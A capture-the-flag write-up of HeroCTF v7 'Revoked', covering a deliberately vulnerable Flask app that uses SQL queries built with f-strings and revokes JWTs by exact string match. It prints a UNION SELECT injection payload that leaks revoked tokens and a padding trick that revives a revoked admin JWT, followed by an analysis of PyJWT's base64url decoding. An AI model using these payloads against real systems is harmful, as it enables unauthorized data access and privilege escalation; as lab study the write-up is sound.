HeroCTF v7 — Revoked (+ Revenge)
Your budget request for the new company personnel index has been declined. Instead, the intern has received a very small bonus in exchange for a homemade solution.
Show them their stinginess could cost them.
The chall maker forgot to remove a debug account... Here is the revenge challenge without this backdoor!
We're given a Python server that looks like this:
py
1import os
2import secrets
3import sqlite3
4import time
5from functools import wraps
6
7import bcrypt
8import jwt
9from dotenv import load_dotenv
10from flask import (
11 Flask,
12 flash,
13 jsonify,
14 make_response,
15 redirect,
16 render_template,
17 request,
18)
19
20app = Flask(__name__)
21app.static_folder = "static"
22load_dotenv()
23app.config["SECRET_KEY"] = "".join(
24 [secrets.choice("abcdef0123456789") for _ in range(32)]
25)
26FLAG = os.getenv("FLAG")
27
28
29def init_db():
30 conn = sqlite3.connect("database.db")
31 cursor = conn.cursor()
32 cursor.execute("""DROP TABLE IF EXISTS employees;""")
33 cursor.execute("""DROP TABLE IF EXISTS revoked_tokens;""")
34 cursor.execute("""DROP TABLE IF EXISTS users;""")
35 cursor.execute("""CREATE TABLE IF NOT EXISTS users (
36 id INTEGER PRIMARY KEY AUTOINCREMENT,
37 username TEXT UNIQUE NOT NULL,
38 is_admin BOOL NOT NULL,
39 password_hash TEXT NOT NULL)""")
40 cursor.execute("""CREATE TABLE IF NOT EXISTS revoked_tokens (
41 id INTEGER PRIMARY KEY AUTOINCREMENT,
42 token TEXT NOT NULL)""")
43 cursor.execute("""CREATE TABLE IF NOT EXISTS employees (
44 id INTEGER PRIMARY KEY AUTOINCREMENT,
45 name TEXT NOT NULL,
46 email TEXT UNIQUE NOT NULL,
47 position TEXT NOT NULL,
48 phone TEXT NOT NULL,
49 location TEXT NOT NULL)""")
50 conn.commit()
51 conn.close()
52
53
54def get_db_connection():
55 conn = sqlite3.connect("database.db")
56 conn.row_factory = sqlite3.Row
57 return conn
58
59
60def token_required(f):
61 @wraps(f)
62 def decorated(*args, **kwargs):
63 token = request.cookies.get("JWT")
64 if not token:
65 flash("Token is missing!", "error")
66 return redirect("/login")
67
68 try:
69 data = jwt.decode(token, app.config["SECRET_KEY"], algorithms=["HS256"])
70 username = data["username"]
71
72 conn = get_db_connection()
73 user = conn.execute(
74 "SELECT id,is_admin FROM users WHERE username = ?", (username,)
75 ).fetchone()
76 revoked = conn.execute(
77 "SELECT id FROM revoked_tokens WHERE token = ?", (token,)
78 ).fetchone()
79 conn.close()
80
81 if not user or revoked:
82 flash("Invalid or revoked token!", "error")
83 return redirect("/login")
84
85 request.is_admin = user["is_admin"]
86 request.username = username
87
88 except jwt.InvalidTokenError:
89 flash("Invalid token!", "error")
90 return redirect("/login")
91
92 return f(*args, **kwargs)
93
94 return decorated
95
96
97@app.route("/", methods=["GET"])
98def index():
99 token = request.cookies.get("JWT", None)
100 if token is None:
101 return redirect("/login")
102 else:
103 return redirect("/employees")
104
105
106@app.route("/register", methods=["GET", "POST"])
107def register():
108 if request.method == "GET":
109 return render_template("register.html")
110 elif request.method == "POST":
111 data = request.form
112 username = data.get("username")
113 password = data.get("password")
114
115 if not username or not password:
116 return jsonify({"message": "Username and password required!"}), 400
117
118 password_hash = bcrypt.hashpw(
119 password.encode("utf-8"), bcrypt.gensalt()
120 ).decode("utf-8")
121
122 conn = get_db_connection()
123 try:
124 conn.execute(
125 "INSERT INTO users (username, is_admin, password_hash) VALUES (?, ?, ?)",
126 (username, False, password_hash),
127 )
128 conn.commit()
129 except sqlite3.IntegrityError:
130 flash("User already exists.", "error")
131 return redirect("/register")
132 finally:
133 conn.close()
134
135 flash("User created successfully.", "success")
136 return redirect("/login")
137
138
139@app.route("/login", methods=["GET", "POST"])
140def login():
141 if request.method == "GET":
142 return render_template("login.html")
143 elif request.method == "POST":
144 data = request.form
145 username = data.get("username")
146 password = data.get("password")
147
148 conn = get_db_connection()
149 user = conn.execute(
150 "SELECT * FROM users WHERE username = ?", (username,)
151 ).fetchone()
152 conn.close()
153
154 if user and bcrypt.checkpw(
155 password.encode("utf-8"), user["password_hash"].encode("utf-8")
156 ):
157 token = jwt.encode(
158 {
159 "username": username,
160 "is_admin": user["is_admin"],
161 "issued": time.time(),
162 },
163 app.config["SECRET_KEY"],
164 algorithm="HS256",
165 )
166 resp = make_response(redirect("/employees"))
167 resp.set_cookie("JWT", token)
168 return resp
169
170 flash("Invalid credentials.", "error")
171 return redirect("/login")
172
173
174@app.route("/logout", methods=["GET"])
175def logout():
176 token = request.cookies.get("JWT")
177 if token:
178 conn = get_db_connection()
179 conn.execute("INSERT INTO revoked_tokens (token) VALUES (?)", (token,))
180 conn.commit()
181 conn.close()
182 resp = make_response(redirect("/login"))
183 resp.delete_cookie("JWT")
184 return resp
185
186
187@app.route("/employees", methods=["GET"])
188@token_required
189def employees():
190 query = request.args.get("query", "")
191 conn = get_db_connection()
192 cursor = conn.cursor()
193 cursor.execute(
194 f"SELECT id, name, email, position FROM employees WHERE name LIKE '%{query}%'"
195 )
196 results = cursor.fetchall()
197 conn.close()
198 print(request.username)
199 return render_template("employees.html", username=request.username, employees=results, query=query)
200
201
202@app.route("/employee/<int:employee_id>", methods=["GET"])
203@token_required
204def employee_details(employee_id):
205 conn = get_db_connection()
206 employee = conn.execute(
207 "SELECT * FROM employees WHERE id = ?", (employee_id,)
208 ).fetchone()
209 conn.close()
210 print(employee)
211 if not employee:
212 flash("Employee not found", "error")
213 return redirect("/employees")
214 return render_template("employee_details.html", username=request.username, employee=employee)
215
216
217@app.route("/admin", methods=["GET"])
218@token_required
219def admin():
220 is_admin = getattr(request, "is_admin", None)
221 if is_admin:
222 return render_template("admin.html", username=request.username, flag=FLAG)
223
224 flash("You don't have the permission to access this area", "error")
225 return redirect("/employees")
226
227
228if __name__ == "__main__":
229 init_db()
230 app.run(debug=False, host="0.0.0.0", port=5000)We can see right off the bat that we have SQL injection in the /employees route:
py
1@app.route("/employees", methods=["GET"])
2@token_required
3def employees():
4 query = request.args.get("query", "")
5 conn = get_db_connection()
6 cursor = conn.cursor()
7 cursor.execute(
8 f"SELECT id, name, email, position FROM employees WHERE name LIKE '%{query}%'"
9 )
10 results = cursor.fetchall()
11 conn.close()
12 print(request.username)
13 return render_template("employees.html", username=request.username, employees=results, query=query)We can then use UNION SELECT to leak any part of their database. But what's this about revoked tokens?
In their token_required decorator, we can see that our JWT is decoded and properties injected into the request object so long as:
- The JWT is valid.
- The
usernamecorresponds to an existing user. - The token isn't in the
revoked_tokenstable.
py
1def token_required(f):
2 @wraps(f)
3 def decorated(*args, **kwargs):
4 token = request.cookies.get("JWT")
5 if not token:
6 flash("Token is missing!", "error")
7 return redirect("/login")
8
9 try:
10 data = jwt.decode(token, app.config["SECRET_KEY"], algorithms=["HS256"])
11 username = data["username"]
12
13 conn = get_db_connection()
14 user = conn.execute(
15 "SELECT id,is_admin FROM users WHERE username = ?", (username,)
16 ).fetchone()
17 revoked = conn.execute(
18 "SELECT id FROM revoked_tokens WHERE token = ?", (token,)
19 ).fetchone()
20 conn.close()
21
22 if not user or revoked:
23 flash("Invalid or revoked token!", "error")
24 return redirect("/login")
25
26 request.is_admin = user["is_admin"]
27 request.username = username
28
29 except jwt.InvalidTokenError:
30 flash("Invalid token!", "error")
31 return redirect("/login")
32
33 return f(*args, **kwargs)
34
35 return decoratedSo the main idea is this: we can leak the revoked_tokens table and (assumedly) find an admin token there. If we can slightly perturb this token such that it is no longer exactly the same token as before (but the token still decodes correctly), we can become admin and win!
py
1@app.route("/admin", methods=["GET"])
2@token_required
3def admin():
4 is_admin = getattr(request, "is_admin", None)
5 if is_admin:
6 return render_template("admin.html", username=request.username, flag=FLAG)
7
8 flash("You don't have the permission to access this area", "error")
9 return redirect("/employees")We can use our simple SQL injection to leak the revoked_tokens table,
Code (sql)
1a%'UNION SELECT id,token,token,token FROM revoked_tokens;--and just check tokens until we find one corresponding to an admin (in this case,
Code
1eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaXNfYWRtaW4iOjEsImlzc3VlZCI6MTc2NDY0NjgzOC4zODE5NzgzfQ.5xEmNRYdgbWg77FWf3kPs28Ulcsqm_JimpCYymoCCCkSo how do we change this slightly to bypass the revoked_tokens check? What if we simply add an = to the end of it? (after all, = is a padding character in base64 each part of the JWT is base64 encoded, right?)
Setting our JWT cookie to
Code
1eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaXNfYWRtaW4iOjEsImlzc3VlZCI6MTc2NDY0NjgzOC4zODE5NzgzfQ.5xEmNRYdgbWg77FWf3kPs28Ulcsqm_JimpCYymoCCCk=we get the flag:
(this same solve works on both Revoked and Revoked Revenge, as we didn't rely on any shenanigans with any "debug accounts").
Why does this payload actually work? Indeed, if we tried to add an = to the JWT on jwt.io, we'd get the following error message:
The caveat is this: JWT segments aren't base64 encoded, they are base64url encoded. And seemingly from reading the MDN documentation,
A common variant of this definition allows only characters that are safe to use in filenames and URL values. This version, defined in RFC 4648, section 5, omits the padding and replaces
+and/with-and_.
So if base64url omits the padding = characters, why did Python's jwt decode it anyways? I decided to read the PyJWT source to find out:
py
1 def decode(
2 self,
3 jwt: str | bytes,
4 key: AllowedPublicKeys | PyJWK | str | bytes = "",
5 algorithms: Sequence[str] | None = None,
6 options: Options | None = None,
7 # deprecated arg, remove in pyjwt3
8 verify: bool | None = None,
9 # could be used as passthrough to api_jws, consider removal in pyjwt3
10 detached_payload: bytes | None = None,
11 # passthrough arguments to _validate_claims
12 # consider putting in options
13 audience: str | Iterable[str] | None = None,
14 subject: str | None = None,
15 issuer: str | Container[str] | None = None,
16 leeway: float | timedelta = 0,
17 # kwargs
18 **kwargs: Any,
19 ) -> dict[str, Any]:
20 """
21 ...
22 """
23 if kwargs:
24 warnings.warn(
25 "passing additional kwargs to decode() is deprecated "
26 "and will be removed in pyjwt version 3. "
27 f"Unsupported kwargs: {tuple(kwargs.keys())}",
28 RemovedInPyjwt3Warning,
29 stacklevel=2,
30 )
31 decoded = self.decode_complete(
32 jwt,
33 key,
34 algorithms,
35 options,
36 verify=verify,
37 detached_payload=detached_payload,
38 audience=audience,
39 subject=subject,
40 issuer=issuer,
41 leeway=leeway,
42 )
43 return decoded["payload"]Seemingly, decode(...) just calls decode_complete(...):
py
1 def decode_complete(
2 self,
3 jwt: str | bytes,
4 key: AllowedPublicKeyTypes = "",
5 algorithms: Sequence[str] | None = None,
6 options: Options | None = None,
7 # deprecated arg, remove in pyjwt3
8 verify: bool | None = None,
9 # could be used as passthrough to api_jws, consider removal in pyjwt3
10 detached_payload: bytes | None = None,
11 # passthrough arguments to _validate_claims
12 # consider putting in options
13 audience: str | Iterable[str] | None = None,
14 issuer: str | Container[str] | None = None,
15 subject: str | None = None,
16 leeway: float | timedelta = 0,
17 # kwargs
18 **kwargs: Any,
19 ) -> dict[str, Any]:
20 """
21 ...
22 """
23 if kwargs:
24 warnings.warn(
25 "passing additional kwargs to decode_complete() is deprecated "
26 "and will be removed in pyjwt version 3. "
27 f"Unsupported kwargs: {tuple(kwargs.keys())}",
28 RemovedInPyjwt3Warning,
29 stacklevel=2,
30 )
31
32 if options is None:
33 verify_signature = True
34 else:
35 verify_signature = options.get("verify_signature", True)
36
37 # If the user has set the legacy `verify` argument, and it doesn't match
38 # what the relevant `options` entry for the argument is, inform the user
39 # that they're likely making a mistake.
40 if verify is not None and verify != verify_signature:
41 warnings.warn(
42 "The `verify` argument to `decode` does nothing in PyJWT 2.0 and newer. "
43 "The equivalent is setting `verify_signature` to False in the `options` dictionary. "
44 "This invocation has a mismatch between the kwarg and the option entry.",
45 category=DeprecationWarning,
46 stacklevel=2,
47 )
48
49 sig_options: SigOptions = {"verify_signature": verify_signature}
50 decoded = api_jws.decode_complete(
51 jwt,
52 key=key,
53 algorithms=algorithms,
54 options=sig_options,
55 detached_payload=detached_payload,
56 )
57
58 payload = self._decode_payload(decoded)
59
60 merged_options = self._merge_options(options)
61 self._validate_claims(
62 payload,
63 merged_options,
64 audience=audience,
65 issuer=issuer,
66 leeway=leeway,
67 subject=subject,
68 )
69
70 decoded["payload"] = payload
71 return decodedand in decode_complete(), the decoding of the JWT string is handled by api_jws.decode_complete(...)
py
1 def decode_complete(
2 self,
3 jwt: str | bytes,
4 key: AllowedPublicKeys | PyJWK | str | bytes = "",
5 algorithms: Sequence[str] | None = None,
6 options: SigOptions | None = None,
7 detached_payload: bytes | None = None,
8 **kwargs: dict[str, Any],
9 ) -> dict[str, Any]:
10 if kwargs:
11 warnings.warn(
12 "passing additional kwargs to decode_complete() is deprecated "
13 "and will be removed in pyjwt version 3. "
14 f"Unsupported kwargs: {tuple(kwargs.keys())}",
15 RemovedInPyjwt3Warning,
16 stacklevel=2,
17 )
18 merged_options: SigOptions
19 if options is None:
20 merged_options = self.options
21 else:
22 merged_options = {**self.options, **options}
23
24 verify_signature = merged_options["verify_signature"]
25
26 if verify_signature and not algorithms and not isinstance(key, PyJWK):
27 raise DecodeError(
28 'It is required that you pass in a value for the "algorithms" argument when calling decode().'
29 )
30
31 payload, signing_input, header, signature = self._load(jwt)
32
33 if header.get("b64", True) is False:
34 if detached_payload is None:
35 raise DecodeError(
36 'It is required that you pass in a value for the "detached_payload" argument to decode a message having the b64 header set to false.'
37 )
38 payload = detached_payload
39 signing_input = b".".join([signing_input.rsplit(b".", 1)[0], payload])
40
41 if verify_signature:
42 self._verify_signature(signing_input, header, signature, key, algorithms)
43
44 return {
45 "payload": payload,
46 "header": header,
47 "signature": signature,
48 }which calls _load(...)
py
1 def _load(self, jwt: str | bytes) -> tuple[bytes, bytes, dict[str, Any], bytes]:
2 if isinstance(jwt, str):
3 jwt = jwt.encode("utf-8")
4
5 if not isinstance(jwt, bytes):
6 raise DecodeError(f"Invalid token type. Token must be a {bytes}")
7
8 try:
9 signing_input, crypto_segment = jwt.rsplit(b".", 1)
10 header_segment, payload_segment = signing_input.split(b".", 1)
11 except ValueError as err:
12 raise DecodeError("Not enough segments") from err
13
14 try:
15 header_data = base64url_decode(header_segment)
16 except (TypeError, binascii.Error) as err:
17 raise DecodeError("Invalid header padding") from err
18
19 try:
20 header: dict[str, Any] = json.loads(header_data)
21 except ValueError as e:
22 raise DecodeError(f"Invalid header string: {e}") from e
23
24 if not isinstance(header, dict):
25 raise DecodeError("Invalid header string: must be a json object")
26
27 try:
28 payload = base64url_decode(payload_segment)
29 except (TypeError, binascii.Error) as err:
30 raise DecodeError("Invalid payload padding") from err
31
32 try:
33 signature = base64url_decode(crypto_segment)
34 except (TypeError, binascii.Error) as err:
35 raise DecodeError("Invalid crypto padding") from err
36
37 return (payload, signing_input, header, signature)which finally calls base64url_decode(...):
py
1def base64url_decode(input: Union[bytes, str]) -> bytes:
2 input_bytes = force_bytes(input)
3
4 rem = len(input_bytes) % 4
5
6 if rem > 0:
7 input_bytes += b"=" * (4 - rem)
8
9 return base64.urlsafe_b64decode(input_bytes)
10
11
12def base64url_encode(input: bytes) -> bytes:
13 return base64.urlsafe_b64encode(input).replace(b"=", b"")which, apart from actually adding padding to our input, just hooks into the Python standard library urlsafe_b64 method. Surprisingly, base64.urlsafe_b64decode() makes no mention of omitting padding characters!
Finally, what does the RFC say? According to the linked RFC 4648 section 5,
so padding characters can be skipped? Sometimes?
And the padding issue seemingly isn't just an MDN misunderstanding either; if you google "base64 URL encoder", many sites (including the somewhat well-known base64encode.org, but also the third result on google, this npm library, and this random Medium article I came across) will omit padding characters when encoding base64url:
But others, including the first result that happened to come up on google, don't.
py
1>>> base64.urlsafe_b64encode(b'aaaaaaa')
2b'YWFhYWFhYQ=='Hell, even the C# standard library for ASP.NET seems to drop padding characters when encoding:
Code (cs)
1 public static int Base64UrlEncode(byte[] input, int offset, char[] output, int outputOffset, int count)
2 {
3 ArgumentNullThrowHelper.ThrowIfNull(input);
4 ArgumentNullThrowHelper.ThrowIfNull(output);
5
6 ValidateParameters(input.Length, nameof(input), offset, count);
7 ArgumentOutOfRangeThrowHelper.ThrowIfNegative(outputOffset);
8
9 var arraySizeRequired = GetArraySizeRequiredToEncode(count);
10 if (output.Length - outputOffset < arraySizeRequired)
11 {
12 throw new ArgumentException(
13 string.Format(
14 CultureInfo.CurrentCulture,
15 EncoderResources.WebEncoders_InvalidCountOffsetOrLength,
16 nameof(count),
17 nameof(outputOffset),
18 nameof(output)),
19 nameof(count));
20 }
21
22#if NETCOREAPP
23 return Base64UrlEncode(input.AsSpan(offset, count), output.AsSpan(outputOffset));
24#else
25 // Special-case empty input.
26 if (count == 0)
27 {
28 return 0;
29 }
30
31 // Use base64url encoding with no padding characters. See RFC 4648, Sec. 5.
32
33 // Start with default Base64 encoding.
34 var numBase64Chars = Convert.ToBase64CharArray(input, offset, count, output, outputOffset);
35
36 // Fix up '+' -> '-' and '/' -> '_'. Drop padding characters.
37 for (var i = outputOffset; i - outputOffset < numBase64Chars; i++)
38 {
39 var ch = output[i];
40 if (ch == '+')
41 {
42 output[i] = '-';
43 }
44 else if (ch == '/')
45 {
46 output[i] = '_';
47 }
48 else if (ch == '=')
49 {
50 // We've reached a padding character; truncate the remainder.
51 return i - outputOffset;
52 }
53 }
54
55 return numBase64Chars;
56#endif
57 }(in C#'s Base64UrlDecode, a comment says to assume that the input contains no padding characters, though at first glance the method appears to work even if padding exists.)
All this to say, I think it's a bit strange that there's so much differing behavior around this spec.